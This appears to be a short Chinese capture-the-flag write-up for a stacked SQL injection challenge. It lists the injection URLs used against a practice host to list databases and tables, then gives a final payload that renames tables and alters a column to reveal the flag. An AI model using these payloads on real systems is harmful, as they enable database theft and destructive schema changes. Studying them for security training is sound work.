环境:攻防世界
order by 3报错说明有两个字段
尝试union select
有很多关键字被ban了,那只能堆叠注入了
暴库
http://220.249.52.134:33346/?inject=-1';show databases;--+
ctftraining
information_schema
mysql
performance_schema
supersqli
test
暴ctftraining的表
http://220.249.52.134:33346/?inject=-1';use ctftraining;show tables;--+
简要数据库结构
用desc关键字查看各表结构,发现flag在supersqli库的1919810931114514表里,而搜索栏查询的是words表的id字段
http://220.249.52.134:33346/?inject=-1';use ctftraining;desc `FLAG_TABLE`;--+
最终payload
?inject=1' or 1=1; rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);
payload分析:
rename table words to words1; //将words表更名为words1
rename table 1919810931114514
to words;//将1919810931114514表更名为words
alter table words change flag id varchar(100); //将words表中的字段flag更名为id